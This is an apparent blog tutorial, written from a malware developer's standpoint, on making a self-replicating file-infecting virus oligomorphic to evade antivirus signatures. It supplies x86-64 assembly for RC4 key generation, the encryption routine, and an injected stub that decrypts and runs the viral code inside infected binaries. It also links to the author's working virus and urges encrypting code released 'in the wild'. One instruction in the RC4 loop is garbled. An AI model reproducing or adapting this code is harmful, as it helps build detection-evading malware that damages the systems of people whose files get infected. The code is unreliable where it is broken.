Introduction

Until not so long ago, antiviruses were mostly relying on signatures to detect malware. What it means is that, whenever a file written to disk, downloaded or launched, the antivirus software checks if it is a known malware. To do so, it is doing two things. The first one is hashing the sample and check if that specific sample is present in the known malware database. But some type of malware are “naturally immune” to this kind of analysis. For example, our file infector, except for its first instance that will stay the same all the time, will never get the same hash since it will propagate in different files and that hash analysis is not able to spot infected files. That is why antivirus rely on a second type analysis known as signature-based detection. Once a sample has been found and analyzed, analysts create a signature for this malware, which is a set of rules to identify it. These rules can be plenty of things but are mostly strings present in memory or specific code sequences. With that kind of analysis, once the rules have been written for our infector, the antivirus software will be able to detect our first virus instance but also each infected binaries since they will all contain these specific signatures. That is where oligomorphism comes in. Even though nowadays, security software are much more complex and use a wide variety of detection techniques, they still use signature-based analysis and you should always encrypt any piece of code that you put out there in the will or you will not be able to reuse it once it has been found and that a signature exists for it.

What is oligomorphism ?

Once faced with the problem of antivirus and signature-based detection, virus developers had to adapt. It wasn’t possible anymore to put the same self-replicating piece of code in thousands of files on a system without getting detected. That’s when a technical race started (and is still continuing now) between malicious software writers and security vendors and that race started with oligomorphism. This word comes from two greek roots: Oligo which means “not much” and morph which means shape. Oligomorphism is a software that will change its shape but now much. Indeed, the executed code and the internal structure of the virus will always remain the same, the only thing that will change is the way it is written to disk. Since at first, antiviruses were only analyzing the file being written or executed, the point was to write an encrypted version of the virus that will change at each replication so that it is not possible to develop a “universal” signature that will match all the replication of the program.

How does it works ?

The principle itself is very simple, each occurrence of our self-replicating program has to be different. To do so, we will encrypt the virus using a key algorithm and we will change the key at each occurrence so that the result is different all the time. Once we’ve done that, we will bypass the signature-based detection but we still have a (big) problem: our encrypted code is not executable anymore. To remedy that, we will have to add a decryptor, that we won’t encrypt so that it stays executable. By doing so, the executed code will be completely different than the one present in the file which is why it will bypass the antivirus and still keep its integrity because the executed code will remain the same at each occurrence.

oligo

Let’s code now

I will only put code chunks concerning encryption in this article, if you want to check a fully-working oligomorphic virus, here is the link to one of mine.

First we have to choose an algorithm to encrypt our virus. It is usually a good solution to work with XOR-based algorithms. The advantage of XOR is that it is reversible and it will break code patterns and have a better entropy than ROT-based algorithms. I’ve chosen to use the RC4 algorithm that generates a pseudo random bytes stream and it has the advantage that we can use the same algorithm to encrypt and decrypt our function.

To proceed, we first want to generate a random key. To do so, we will use the /dev/urandom file that is a continuous random byte stream. I’ve chosen to use a 32 bytes key but it can work with any number even though it is better to choose a power of two.



generate_key:
    push    rbp
    mov     rbp, rsp
    push    rdi
    lea     rdi, [rel key_file]     ; /dev/urandom
    xor     rsi, rsi ; O_RDONLY
    mov     eax, SYS_OPEN
    syscall
    cmp     eax, 0
    jl      _end                    ; in case we cannot get a key and therefore encrypt our virus
    push    rax
    mov     rdi, rax
    lea     rsi, [rel key]          ; where our key will be stored
    mov     rdx, key_len
    mov     eax, SYS_READ
    syscall
    pop     rdi
    mov     eax, SYS_CLOSE
    syscall
    leave
    ret

Then we will code the RC4 routine (if you want to more about the algorithm, you can visit its Wikipedia page). It is simply the reimplementation of the Wikipedia pseudo-code in ASM.



; rdi       crypt_pointer
; rsi       crypt_len
rc4:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x120          ; we reserve space on the stack for the vector
    sub     rsp, rsi
    mov     [rsp], rdi
    mov     [rsp + 0x8], rsi
    mov     rcx, 0x100
    xor     al, al
    lea     rdi, [rsp + 0x10]
loop_init_vector:
    stosb
    inc al
    loop    loop_init_vector    ; we have a [0...255] vector

    xor     r8, r8
    xor     r9, r9
    lea     rdi, [rel key]
    lea     rsi, [rsp + 0x10]
    mov     cx, 0x100
rc4_init_loop:                          ; we now modify the vector with the random bytes of the key
    mov     rax, r8                     ; the advantage of a power of 2 key is that we can use the AND operator
    and     rax, 0x1f                   ; instead of DIV and MOD 
    add     rax, rdi
    movzx   rdx, BYTE [rax]
    mov     rbx, r8
    add     rbx, rsi
    movzx   r10, BYTE [rbx]
    add     r9, r10
    add     r9, rdx
    movzx   r9, r9b
    mov     rax, r9
    add     rax, rsi
    mov     dl, BYTE [rax]
    mov     BYTE [rax], r10b
    mov     BYTE [rbx], dl
    inc     r8
    loop    rc4_init_loop

rc4_crypt:                      ; then we encrypt our payload with the generated vector
    mov     rcx, [rsp + 0x8]
    lea     rdi, [rsp + 0x110]
    mov     rsi, [rsp]
    lea     r10, [rsp + 0x10]
    xor     r8, r8
    xor     r9, r9

rc4_crypt_loop:
    inc     r8
    movzx   r8, r8b
    mov     r11, r10
    add     r11, r8
    add     r9b, [r11]
    movzx   r9, r9b
    mov     r12, r10
    add     r12, ]
    mov     dl, [r12]
    mov     bl, [r11]
    mov     [r12], bl
    mov     [r11], dl
    mov     dl, [r11]
    add     dl, [r12]
    movzx   rdx, dl
    add     rdx, r10
    mov     al, [rdx]
    xor     al, BYTE [rsi]
    mov     BYTE [rdi], al
    inc     rdi
    inc     rsi
    loop    rc4_crypt_loop

    mov     rdi, [rsp]
    lea     rsi, [rsp + 0x110]
    mov     rcx, [rsp + 0x8]
copy_crypted_mem:                   ; and we copy the encrypted payload in the memory
    lodsb
    stosb
    loop    copy_crypted_mem

    leave
    ret

Now that we have the algorithm that is gonna encrypt and decrypt our payload, we can use it before copying our payload so that we copy an encrypted version. The last thing that we need to handle is decryption. You should be familiar with the code bouncing technique described in this article. Since we now have to decrypt the payload, it will be simpler to put it always at the same place and therefore use this technique so that we are nopt limited by the space available in the binary.

Here is the code of the new payload that will be put in the .text and that will call the decryptor before jumping on the decrypted code. Of course, the decryptor has to not be encrypted. I put it after the .text but it would also be great to put it just before the viral code though we would need to calculate the offset of the decryptor to be able to call it.



payload_mprotect:
    push    rbx
    push    r12
    lea     rdi, [rel payload_mprotect]
    add     rdi, [rel data_addr_offset]
    mov     rsi, [rel data_len]
    mov     rdx, PROT_READ | PROT_WRITE | PROT_EXEC
    xor     rax, rax
    add     rax, SYS_MPROTECT                       ; gives execution rights to the payload
    syscall
    lea     rdi, [rel payload_mprotect]
    add     rdi, [rel data_addr_offset]
    add     rdi, [rel data_len]
    sub     rdi, virus_len
    mov     rsi, virus_len
    push    rdi
    call    rc4                                     ; decrypts the payload
    pop     rax
    call    rax                                     ; jumps on the viral code
    pop     r12
    pop     rbx
    final_jump_opcode: db 0xe9                      ; jumps back to the original entrypoint
    final_jump: dd _end - $ - 4
    final_jump_offset equ final_jump - _start
    final_jump_offset_text equ final_jump - payload_mprotect

Conclusion

Now, you’ve seen the basis of oligomorphism and how to make your virus oligomorphic. Even though it helps a great deal to counter signature-based detection, there is still one part of the code that stays constant, it is the decryptor and there could be a signature developed for it.

To counter this, the next step in our malware developer journey is polymorphism and metamorphism and that is where the real fun comes in! The point of polymorphism is that not all generation of our virus use the same decryptor so that there cannot be a unique signature produced. Once security vendors understood that files were not gonna contain signatures anymore, they decided to sandbox the software before executing them for real. It means that it will be executed in a controlled-environment and then the process memory will be analyzed. Once decrypted, our payload is constant and looking for its signature inside the memory would prove successful so to avoid that, we can write metamorphic code. It means self-modifying code, each time our infector will replicate, it will provide a totally different payload though it will still achieve the same function. I’m still working on my metamorphic engine and will come back for another article once it is ready.